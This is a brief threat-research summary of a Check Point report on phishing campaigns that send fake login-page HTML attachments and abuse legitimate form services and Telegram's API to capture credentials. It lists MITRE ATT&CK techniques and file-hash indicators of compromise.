Threat Research

‘Sign in to continue’ and suffer : Attackers abusing legitimate services for credential theft – Check Point Blog

Securonix

Check Point Research identified ongoing phishing campaigns that abuse legitimate form services to harvest credentials and exfiltrate data, helping attackers evade detection. The attackers rely on HTML attachments masquerading as login pages and employ services like EmailJS, Formbold, Formspree, and Formspark to capture credentials.

Keypoints

  • HTML attachments are a common phishing vector, often masquerading as login pages from known services.
  • Attackers exploit legitimate online form builders (EmailJS, Formbold, Formspree, Formspark) to host credential-harvesting forms.
  • Credentials submitted through these forms are sent to attackers via web servers or Telegram’s API.
  • The campaign includes thousands of emails with multiple HTML templates and urgency signals.
  • Phishing pages sometimes pre-fill the victim’s email address to look legitimate and trap credentials.
  • Check Point emphasizes protection via Threat Emulation and AI Deep Learning; notable phishing prevention metrics.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Phishing emails with HTML attachments masquerade as login pages to harvest credentials. Quote: ‘phishing emails contain a malicious URL or attachment’ and ‘HTML files are one of the most common attack vectors.’
  • [T1566.003] Phishing: Spearphishing via Service – Attackers use legitimate form services’ APIs (EmailJS, Formbold, Formspree, Formspark) to host phishing forms, making malicious HTML harder to block. Quote: ‘using a legitimate form service’s API… makes malicious HTML files harder to block.’
  • [T1567.002] Exfiltration to Web Service – The harvested credentials are sent to the attacker via web services or Telegram API. Quote: ‘the credentials are sent to the malicious actor, usually by a web-server or Telegram’s API.’

Indicators of Compromise

  • [File hash] EmailJS Samples – 053c0cd2f56b2d8276d0c5e11cbe3a5c96ec278d, d36908ce63f5386ddffaa390a0baef6a045e2254
  • [File hash] FormSpark Samples – 2c6fe45dbf760970b624b08cb1ff7bc5a5e21aa8, 56b2d8a45e34384c4eb2c886037f22c9c90f3721
  • [File hash] FormSpree Samples – b07876f8254667e0f023559eed548de7ad967941, 4c4a0d818dff16566e4bbad0d3e3fbba18e7063d
  • [File hash] FormBold Samples – f82fb2f5f17a5bad4a0dce32ceaea377fe78c905, 5da1c26703a80b3f8e663461ef9d612b4ccdee38

Read more: https://blog.checkpoint.com/security/sign-in-to-continue-and-suffer-attackers-abusing-legitimate-services-for-credential-theft/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint